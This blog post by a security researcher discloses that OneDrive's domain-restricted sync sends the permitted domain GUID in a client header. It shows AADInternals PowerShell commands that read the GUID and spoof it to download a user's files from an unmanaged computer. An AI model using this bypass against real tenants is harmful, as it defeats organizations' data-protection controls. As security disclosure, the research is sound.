Bypassing OneDrive sync domain restrictions

Bypassing OneDrive sync domain restrictions

OneDrive has a security option to allow syncing only from PCs joined to specific domains. In this blog, using the latest AADInternals toolkit (announced at Black Hat Europe 2019), I’ll show how the domain restrictions can be easily bypassed.

OneDrive synchronization client

OneDrive synchronization client (OneDrive.exe) is a client used to sync files between cloud (OneDrive & SharePoint) and computers. While this is a powerfull tool to keep your files current, it has some security issues.

As one can connect to Office 365 and OneDrive from any computer, this allows downloading files to also computers that are not managed by the corporation. And this is not a good thing from security point-of-view.

To address this issue, there is an option at OneDrive admin center where the sync can be limited to PCs joined to specific domains.

This can also be set and viewed using PowerShell:

# Get the SharePoint Online sync client restrictions
Get-SPOTenantSyncClientRestriction
In this tenant, the restriction is enabled and limited to computers joined to the domain with guid of {667965e7-de8e-440d-adc3-371a35474a41}.

TenantRestrictionEnabled : True
AllowedDomainList        : {667965e7-de8e-440d-adc3-371a35474a41}
BlockMacSync             : True
ExcludedFileExtensions   : {}
OptOutOfGrooveBlock      : False
OptOutOfGrooveSoftBlock  : False

How does the domain restriction work?

The OneDrive, as the most of the Office products and tools, is using REST APIs. So, the traffic between the OneDrive client and cloud is HTTP-based. Now, as the traffic is HTTP I started to wonder how does the cloud side know which domain the computer is joined. A quick check with Fiddler showed that the client sends a special header X-MachineDomainInfo containing the domain guid of the computer the OneDrive.exe is running on.

As such, this really is not an security feature at all, as one can bypass the restriction as long as the guid is know.

To get a domain guid from a domain joined PC:

# Get the domain name and guid
Get-WmiObject -Class Win32_NTDomain | select DomainName,DomainGuid

The output should be similar to following, depending on the number of domains of the AD forest:

DomainName  DomainGuid                            
----------  ----------                            

COMPANY.COM {667965e7-de8e-440d-adc3-371a35474a41}

Passing the domain restrictions

Version 0.2.7 of AADInternals contains functions for downloading from and sending files to OneDrive for Business.

First, a OneDriveSettings object needs to created. This can be done using credentials, Kerberos ticket, SAML token, or interactive login as below (promtps twice for both OfficeApps and OneDrive APIs):

# Create a new OneDriveSettings object
$os = New-AADIntOneDriveSettings

Next, you can try to dowload the files from the user’s OneDrive:

# Download the files from user's OneDrive
Get-AADIntOneDriveFiles -OneDriveSettings $os | Format-Table

If you got an error similar to following, the domain restrictions apply:

Invoke-ODCommand : Got 501 - try using a proper domain guid
At C:\Program Files\WindowsPowerShell\Modules\AADInternals\OneDrive.ps1:120 char:25
+ ... $response = Invoke-ODCommand -Command $command -OneDriveSettings $One ...
+                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [Write-Error], WriteErrorException
    + FullyQualifiedErrorId : Microsoft.PowerShell.Commands.WriteErrorException,Invoke-ODCommand

Now let’s try again with the domain guid from the screenshot above:

# Download the files from user's OneDrive with domain guid
Get-AADIntOneDriveFiles -OneDriveSettings $os -DomainGuid "667965e7-de8e-440d-adc3-371a35474a41" | Format-Table

And now the files are downloading!

Path                              Size  Created            Modified           ResourceID                   
----                              ----  -------            --------           ----------                   
\RootFolder\Document1.docx        11032 2.12.2019 20.47.23 2.12.2019 20.48.46 5e7acf393a2e45f18c1ce6caa7...
\RootFolder\Book.xlsx             8388  2.12.2019 20.49.14 2.12.2019 20.50.14 b26c0a38d4d14b23b785576e29...
\RootFolder\Docs\Document1.docx   84567 9.12.2019 11.24.40 9.12.2019 12.17.50 d9d51e47b66c4805aff3a08763...
\RootFolder\Docs\Document2.docx   31145 7.12.2019 17.28.37 7.12.2019 17.28.37 972f9c317e1e468fb2b6080ac2...
Dr Nestori Syynimaa (@DrAzureAD) avatar
About Dr Nestori Syynimaa (@DrAzureAD)
Dr Syynimaa works as Principal Identity Security Researcher at Microsoft Security Research.
Before his security researcher career, Dr Syynimaa worked as a CIO, consultant, trainer, and university lecturer for over 20 years. He is a regular speaker in scientific and professional conferences related to Microsoft 365 and Entra ID (Azure AD) security.

Before joining Microsoft, Dr Syynimaa was Microsoft MVP in security category and Microsoft Most Valuable Security Researcher (MVR).